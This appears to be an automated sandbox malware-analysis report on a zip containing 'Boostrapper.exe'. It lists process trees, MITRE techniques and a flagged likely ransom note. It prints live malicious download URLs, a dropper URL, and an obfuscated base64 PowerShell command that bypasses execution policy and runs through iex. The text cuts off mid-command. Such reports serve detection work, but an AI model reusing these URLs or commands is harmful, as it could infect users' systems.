hxxps://files[.]catbox[.]moe/9fjb1l[.]zip

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2024 01:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://files.catbox.moe/9fjb1l.zip

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://pastejustit.com/raw/vbrkqvam88

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

58 1372 powershell.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4312 powershell.exe

flow	pid	process
58	1372	powershell.exe

pid	process
4312	powershell.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings msedge.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

952 NOTEPAD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	msedge.exe

pid	process
952	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exe

pid	process
2428	msedge.exe
2428	msedge.exe
5080	msedge.exe
5080	msedge.exe
4008	identity_helper.exe
4008	identity_helper.exe
4652	msedge.exe
4652	msedge.exe
1372	powershell.exe
1372	powershell.exe
4312	powershell.exe
4312	powershell.exe
4312	powershell.exe
1372	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

Processes:

msedge.exe

pid process

5080 msedge.exe
5080 msedge.exe
5080 msedge.exe
5080 msedge.exe
5080 msedge.exe
5080 msedge.exe
5080 msedge.exe
5080 msedge.exe
5080 msedge.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4312 powershell.exe
Token: SeDebugPrivilege 1372 powershell.exe

description	pid	process
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe
5080	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 5080 wrote to memory of 2588	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 2588	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 5076	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 2428	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 2428	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe
PID 5080 wrote to memory of 3204	5080	msedge.exe	msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://files.catbox.moe/9fjb1l.zip
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc69e246f8,0x7ffc69e24708,0x7ffc69e24718
  2⤵
  PID:2588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
  2⤵
  PID:5076
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2648 /prefetch:8
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:5016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5296 /prefetch:1
  2⤵
  PID:1936
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  PID:4488
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3356 /prefetch:8
  2⤵
  PID:2500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:4332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3724 /prefetch:1
  2⤵
  PID:4944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2148,12448129372730621964,4882445471994192873,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6208 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4652

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2436

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1652

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3816

C:\Users\Admin\AppData\Local\Temp\Temp1_9fjb1l.zip\Boostrapper.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_9fjb1l.zip\Boostrapper.exe"
1⤵
PID:2756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGwATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAEoARwBoAFgAYgBtAFEAcwBJAEQAQQBwAEQAUQBwADkARABRAG8AawBZADMAVgB5AGMAbQBWAHUAZABGAGQAcABiAG0AUgB2AGQAMQBSAHAAZABHAHgAbABJAEQAMABnAFIAMgBWADAAUQBXAE4AMABhAFgAWgBsAFYAMgBsAHUAWgBHADkAMwBWAEcAbAAwAGIARwBVAE4AQwBrAGgAcABaAEcAVgBCAFkAMwBSAHAAZABtAFYAWABhAFcANQBrAGIAMwBjAE4AQwBnAD0APQAiAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuACkALgBTAGMAcgBpAHAAdAApACkAIAB8ACAAaQBlAHgA"
  2⤵
  PID:768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1A